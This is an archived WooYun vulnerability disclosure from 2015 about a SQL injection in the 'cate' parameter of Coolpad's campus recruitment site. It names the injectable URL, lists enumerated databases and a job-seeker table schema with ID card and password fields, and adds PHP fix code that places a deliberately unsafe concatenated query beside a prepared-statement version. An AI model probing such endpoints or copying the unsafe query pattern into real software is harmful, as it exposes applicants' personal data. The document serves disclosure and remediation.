
Vulnerability Summary

Defect ID: wooyun-2015-0134315

Title: Mobile industry security: Yulong Communication (Coolpad) MySQL injection (exposes user résumés)

Vendor: yulong.com

Author: 路人甲

Submitted: 2015-08-15 18:00

Fixed: 2015-10-01 08:54

Published: 2015-10-01 08:54

Type: SQL injection

Severity: High

Self-assessed rank: 16

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-08-15: Details sent to the vendor, awaiting vendor handling
2015-08-17: Vendor confirmed; details disclosed to the vendor only
2015-08-27: Details disclosed to core white hats and relevant domain experts
2015-09-06: Details disclosed to regular white hats
2015-09-16: Details disclosed to intern white hats
2015-10-01: Details disclosed to the public

Brief description:

MySQL injection & XSS

Detailed description:

http://campus.coolpad.com//index.php?c=schoolRecruitment&cate=internetBusy*&f=jobPosition

The cate parameter is injectable!

[Screenshots: 1.jpg, 2.jpg, 3.jpg]


available databases [3]:
[*] coolpadjobdb
[*] information_schema
[*] test


Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college |
| clp_college_department |
| clp_count_position |
| clp_department |
| clp_department_managers |
| clp_hiring |
| clp_hiring_employ |
| clp_hiring_first |
| clp_hiring_second |
| clp_lecture |
| clp_managers |
| clp_managers_area |
| clp_position |
| clp_position_city |
| clp_position_interviewarea |
| clp_position_type |
| clp_position_workarea |
| clp_preach_plan |
| clp_province |
| clp_ranks |
| clp_recruit_area |
| clp_recruitment_dynamics |
| clp_seekers |
| clp_seekers_active |
| clp_seekers_audition |
| clp_seekers_behave |
| clp_seekers_connection |
| clp_seekers_education |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience |
| clp_seekers_self_evaluation |
| clp_seekers_skills_hobbies |
| statistics_datas |
| statistics_status |
+---------------------------------+


Database: coolpadjobdb
Table: clp_seekers
[38 columns]
+----------------------------+------------------------------------------------------------------------+
| Column                     | Type                                                                   |
+----------------------------+------------------------------------------------------------------------+
| coolyun_uid                | int(9)                                                                 |
| s_address                  | varchar(420)                                                           |
| s_before_colloge_residence | varchar(45)                                                            |
| s_birthday                 | timestamp                                                              |
| s_card_type                | enum('idcard','other')                                                 |
| s_edit_date                | datetime                                                               |
| s_email                    | varchar(24)                                                            |
| s_emergency_contact        | varchar(72)                                                            |
| s_emergency_contact_tel    | varchar(18)                                                            |
| s_emergency_number         | varchar(42)                                                            |
| s_eng_rank_goal            | varchar(12)                                                            |
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_expect_graduation        | timestamp                                                              |
| s_graduation_time          | datetime                                                               |
| s_health                   | enum('better','nice','bad')                                            |
| s_height                   | int(4)                                                                 |
| s_iconb                    | varchar(420)                                                           |
| s_icons                    | varchar(420)                                                           |
| s_id                       | int(8)                                                                 |
| s_idcard                   | varchar(20)                                                            |
| s_living_city              | varchar(45)                                                            |
| s_marital_status           | enum('married','unmarried','divorce','secret')                         |
| s_name                     | varchar(72)                                                            |
| s_nation                   | varchar(32)                                                            |
| s_origin_palce             | varchar(128)                                                           |
| s_other_eng_rank_goal      | varchar(12)                                                            |
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_other_lang_rank          | varchar(300)                                                           |
| s_password                 | varchar(32)                                                            |
| s_photo                    | varchar(300)                                                           |
| s_political_status         | enum('members','party','other')                                        |
| s_portrait                 | varchar(360)                                                           |
| s_realname                 | varchar(24)                                                            |
| s_save_date                | datetime                                                               |
| s_sex                      | enum('lady','gentleman')                                               |
| s_tel                      | varchar(18)                                                            |
| s_wechat                   | varchar(24)                                                            |
| s_weight                   | int(4)                                                                 |
+----------------------------+------------------------------------------------------------------------+


No data was read.

Proof of vulnerability:

Fix recommendation:
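The report leaves the fix section empty. The following is an added example, not code from the Coolpad site or from the reporter, showing the concatenation pattern that makes a query-string parameter such as cate injectable next to a hardened version that validates the slug and binds it with a PDO prepared statement; the clp_position column names (p_id, p_title, p_cate), the DSN and the credentials are assumptions for illustration.

```php
<?php
// Added example for index.php?c=schoolRecruitment&cate=...&f=jobPosition.
// Column names p_id, p_title and p_cate on clp_position are assumed.

// Vulnerable pattern: the raw query-string value is spliced into the SQL
// text, so the request controls part of the statement MySQL executes.
function positionsByCategoryUnsafe(PDO $db, string $cate): array
{
    $sql = "SELECT p_id, p_title FROM clp_position WHERE p_cate = '" . $cate . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: allowlist the slug's shape, then bind it as a parameter
// so the value travels separately from the statement text.
function positionsByCategory(PDO $db, string $cate): array
{
    // Category slugs on this site look like "internetBusy": short alphanumeric
    // tokens. Reject anything else before it reaches the database.
    if (!preg_match('/^[A-Za-z0-9]{1,32}$/', $cate)) {
        throw new InvalidArgumentException('invalid category');
    }
    $stmt = $db->prepare(
        'SELECT p_id, p_title FROM clp_position WHERE p_cate = :cate'
    );
    $stmt->bindValue(':cate', $cate, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Render one row; htmlspecialchars() addresses the XSS half of the report's
// brief description by encoding database content before it reaches HTML.
function renderPosition(array $row): string
{
    return '<li>' . htmlspecialchars($row['p_title'], ENT_QUOTES, 'UTF-8') . '</li>';
}

// DSN and credentials are placeholders; ATTR_EMULATE_PREPARES=false makes
// MySQL receive a true server-side prepared statement.
$db = new PDO(
    'mysql:host=localhost;dbname=coolpadjobdb;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASSWORD_PLACEHOLDER',
    [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);
foreach (positionsByCategory($db, $_GET['cate'] ?? '') as $row) {
    echo renderPosition($row);
}
```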

Copyright notice: when reposting, cite the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-08-17 08:52

Vendor reply:

Thanks for reporting; we will handle it as soon as possible.

Latest status:

None yet